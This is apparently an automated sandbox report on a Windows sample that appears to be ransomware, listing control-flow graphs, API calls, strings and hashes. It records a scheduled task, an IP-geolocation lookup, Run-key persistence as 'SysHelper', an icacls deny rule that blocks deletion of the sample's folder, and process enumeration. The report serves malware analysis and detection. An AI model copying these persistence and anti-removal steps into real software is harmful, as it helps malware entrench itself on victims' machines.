                                                                                                                                                    control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 705 40d3e2-40d3fe call 40b140 697->705 706 40d3cc-40d3dd CoUninitialize 697->706 700 40da69-40da6d 698->700 701 40da7a-40da8a 700->701 702 40da6f-40da77 call 422587 700->702 701->691 702->701 711 40d400-40d402 705->711 712 40d404 705->712 706->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                                                                    • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                    • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                    • API String ID: 2496729271-1738591096
                                                                                                                                                    • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                    • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                                                                    • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                    • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 923 40d037 922->923 923->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 943 40d0cd-40d0e1 call 414300 935->943 944 40d0bf-40d0ca call 422587 935->944 940 40d093-40d09b call 422587 936->940 941 40d09e-40d0b4 call 413d40 936->941 938->912 939->938 940->941 941->935 943->928 954 40d0e7-40d149 call 413010 943->954 944->943 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 969 40d1c7-40d1c9 967->969 970 40d1a2-40d1a6 968->970 969->970 971 40d1b3-40d1c5 970->971 972 40d1a8-40d1b0 call 422587 970->972 971->931 972->971
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                    • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                                                                    Strings
                                                                                                                                                    • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                                                                    • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                                                                    • "country_code":", xrefs: 0040CFE1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                    • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                    • API String ID: 1485416377-2962370585
                                                                                                                                                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                    • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                                                                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                    • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 628 411e28-411e2c 620->628 629 411dfa-411dfe 620->629 623 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->623 624 411e89-411e91 call 422587 621->624 633 411f36-411f38 623->633 634 411f3a-411f3f 623->634 624->623 631 411e3c-411e50 PathFileExistsW 628->631 632 411e2e-411e39 call 422587 628->632 635 411e00-411e08 call 422587 629->635 636 411e0b-411e23 call 4145a0 629->636 631->621 641 411e52-411e57 631->641 632->631 639 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->639 640 411f40-411f49 634->640 635->636 636->628 653 411f98-411fa0 639->653 654 411fce-411fe9 639->654 640->640 644 411f4b-411f4d 640->644 645 411e59-411e5e 641->645 646 411e6a-411e6e 641->646 644->639 645->646 649 411e60-411e65 call 414690 645->649 646->610 651 411e74-411e77 646->651 649->646 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 661 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->661 662 412000-412009 657->662 663 411fbf-411fc9 call 415c10 658->663 665 411fb0-411fb9 659->665 671 4121d1-4121d5 661->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 661->672 662->662 667 41200b-41200d 662->667 663->654 665->665 669 411fbb-411fbd 665->669 667->661 669->663 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                    • _memset.LIBCMT ref: 00411D3B
                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                    • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                                                                    • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                                                                    • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                                                                    • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                                                                    • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                                                                    • _memset.LIBCMT ref: 00412090
                                                                                                                                                    • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                                                                    • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                                                                    • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                                                                    • _memset.LIBCMT ref: 00412120
                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                                                                    • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                    • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                    • API String ID: 2589766509-1182136429
                                                                                                                                                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                    • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                                                                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                    • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                                                                    • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                                                                    • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                                                                    • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                                                                    • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                    • API String ID: 3668891214-3807497772
                                                                                                                                                    • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                                                                    • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                                                                    • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                                                                    • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 984 4235a0 976->984 977->976 983 4235c0-4235c3 977->983 985 4235d7-4235dd 983->985 986 4235c5 983->986 989 4235a2-4235a8 984->989 987 4235e9 call 42fb64 985->987 988 4235df 985->988 990 4235c7-4235c9 986->990 991 4235cb-4235d5 call 425208 986->991 996 4235ee-4235fa call 42f803 987->996 988->991 993 4235e1-4235e7 988->993 990->985 990->991 991->984 993->987 993->991 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->989 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->989 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->989 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->989 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 004235B1
                                                                                                                                                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                                                                    • __allrem.LIBCMT ref: 004236F3
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                                                                    • __allrem.LIBCMT ref: 00423726
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                                                                    • __allrem.LIBCMT ref: 0042375B
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1503770280-0
                                                                                                                                                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                    • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                                                                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                    • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1060 4416eb-4416f5 1061 4416f7-441708 call 425208 call 4242d2 1060->1061 1062 44170a-441716 1060->1062 1078 441749-44174c 1061->1078 1064 44174d-44174f 1062->1064 1065 441718-44171a 1062->1065 1066 441751-441762 call 425208 call 4242d2 1064->1066 1067 44171c-44171e 1064->1067 1065->1066 1065->1067 1082 441748 1066->1082 1069 441720 1067->1069 1070 441723-441731 call 441667 1067->1070 1069->1070 1080 441775-441777 1070->1080 1081 441733-44173f call 42c160 1070->1081 1080->1082 1081->1080 1085 441741-441743 1081->1085 1082->1078 1086 441764-441773 call 42c0fd 1085->1086 1087 441745-441747 1085->1087 1086->1080 1090 441779-4417a2 call 4242fd call 428520 1086->1090 1087->1082 1095 4417a4-4417b6 call 425208 call 4242d2 1090->1095 1096 4417b8-4417cc call 448ff4 1090->1096 1105 4417f4-4417f9 call 428565 1095->1105 1096->1095 1101 4417ce-4417db call 428af7 call 441667 1096->1101 1109 4417e0-4417f2 call 4417fd 1101->1109 1109->1105
                                                                                                                                                    APIs
                                                                                                                                                    • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                                                                    • _strlen.LIBCMT ref: 00441734
                                                                                                                                                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                    • _strnlen.LIBCMT ref: 004417BF
                                                                                                                                                    • __lock.LIBCMT ref: 004417D0
                                                                                                                                                    • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2168648987-0
                                                                                                                                                    • Opcode ID: def383993aa6414e642db034fbd0b05392c2206d38604743aacc9a89ce837c68
                                                                                                                                                    • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                                                                    • Opcode Fuzzy Hash: def383993aa6414e642db034fbd0b05392c2206d38604743aacc9a89ce837c68
                                                                                                                                                    • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1113 423b4c-423b52 1114 423b61-423b64 call 420c62 1113->1114 1116 423b69-423b6c 1114->1116 1117 423b54-423b5f call 42793d 1116->1117 1118 423b6e-423b71 1116->1118 1117->1114 1121 423b72-423bb2 call 430d21 call 430eca call 430d91 1117->1121 1128 423bb4-423bba call 422587 1121->1128 1129 423bbb-423bbf 1121->1129 1128->1129
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 00423B64
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
